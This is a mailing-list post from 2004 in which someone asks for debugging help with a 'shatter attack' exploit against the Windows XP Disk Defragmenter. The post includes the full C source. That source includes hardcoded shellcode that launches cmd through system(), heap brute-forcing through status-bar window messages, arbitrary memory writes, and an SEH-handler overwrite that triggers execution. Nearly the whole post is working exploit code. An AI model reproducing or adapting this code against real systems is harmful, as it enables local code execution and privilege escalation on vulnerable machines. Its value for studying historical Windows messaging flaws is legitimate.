Vulnerability Development mailing list archives
status-bar SHATTER attack
From: "bil_912" <bil_912 () coolgoose com>
Date: Thu, 8 Jul 2004 03:59:38 +0600
Hello all. Recently I was experimenting with the >> STATUS-BAR << shatter-attack code provided
by brett.moore () security-assessment com; the code, with tiny modifications, is attached here. The problem is that on XP SP1 the top SEH handler at 0x77ed73b4 was being overwritten with 0x77ed74c0, where my
shellcode resides, but even after that the code did not get executed. I was attacking the "Disk Defragmenter" utility that ships with Windows XP. Can anyone please point out where I'm going wrong? Thank you. [I'm attaching a screenshot of my desktop taken while attacking.] //=========================================================================
/******************************************************************************* ******
* Statusbar Control Shatter exploit * * Demonstrates the use of a combination of windows messages to; * - brute force a useable heap address * - place structure information inside a process * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * - heapaddr is the base heap address to start brute forcing * * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues * Try it out against any program with a progress bar *
******************************************************************************** *****/
#include <windows.h> #include <commctrl.h> #include <stdio.h> // Local No Null Cmd Shellcode. BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
char g_classNameBuf[ 256 ]; char tWindow[]="disk defragmenter"; long sehHandler = 0x77ed73b4; // Critical Address To Overwrite long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space unsigned long heapaddr = 0x00100000; // Base Heap Address long mainhWnd; void doWrite(HWND hWnd, long tByte,long address); void BruteForceHeap(HWND hWnd); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { HMODULE hMod; DWORD ProcAddr; long x; //making the shellcode ready hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) *(long *)&exploit[8] = ProcAddr; //*************************** //printf("+ Enter Window Title\n",tWindow); //flushall(); //gets(tWindow); if (argc == 2) sscanf(argv[1],"%lx",&heapaddr);// Oddity printf("%% Using base heap address...0x%xh\n",heapaddr); printf("+ Finding %s Window...\n",tWindow); mainhWnd = (long)FindWindow(NULL,tWindow); if(mainhWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At......0x%xh\n",mainhWnd); IterateWindows(mainhWnd); printf("+ Done...\n"); return 0; } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0) { // Find Heap Address BruteForceHeap((HWND) hWnd); //printf("+ Enter heapaddr : \n"); //scanf("%lx",&heapaddr); // Inject shellcode to known address printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 
0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); getch(); SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESSS_BAR SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1); printf("+ Done...\n"); exit(0); } } void BruteForceHeap(HWND hWnd, long tByte,long address) { long retval; BOOL foundHeap = FALSE; char buffer[5000]; memset(buffer,0,sizeof(buffer)); while (!foundHeap) { printf("+ Trying Heap Address.......0x%xh ",heapaddr); memset(buffer,0x58,sizeof(buffer)-1); // settin to X // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); printf("%d",retval); if(retval == 1) { // First Retval should be 1 memset(buffer,0x80,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); if(retval > 1) { // Second should be larger than 1 printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr); return(0); } } printf("\n"); heapaddr += 2500; } } void doWrite(HWND hWnd, long tByte,long address) { char buffer[5000]; memset(buffer,0,sizeof(buffer)); memset(buffer,tByte,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Statusbar width SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr); SendMessage( hWnd,(UINT) SB_GETPARTS,1,address); } //=========================================================================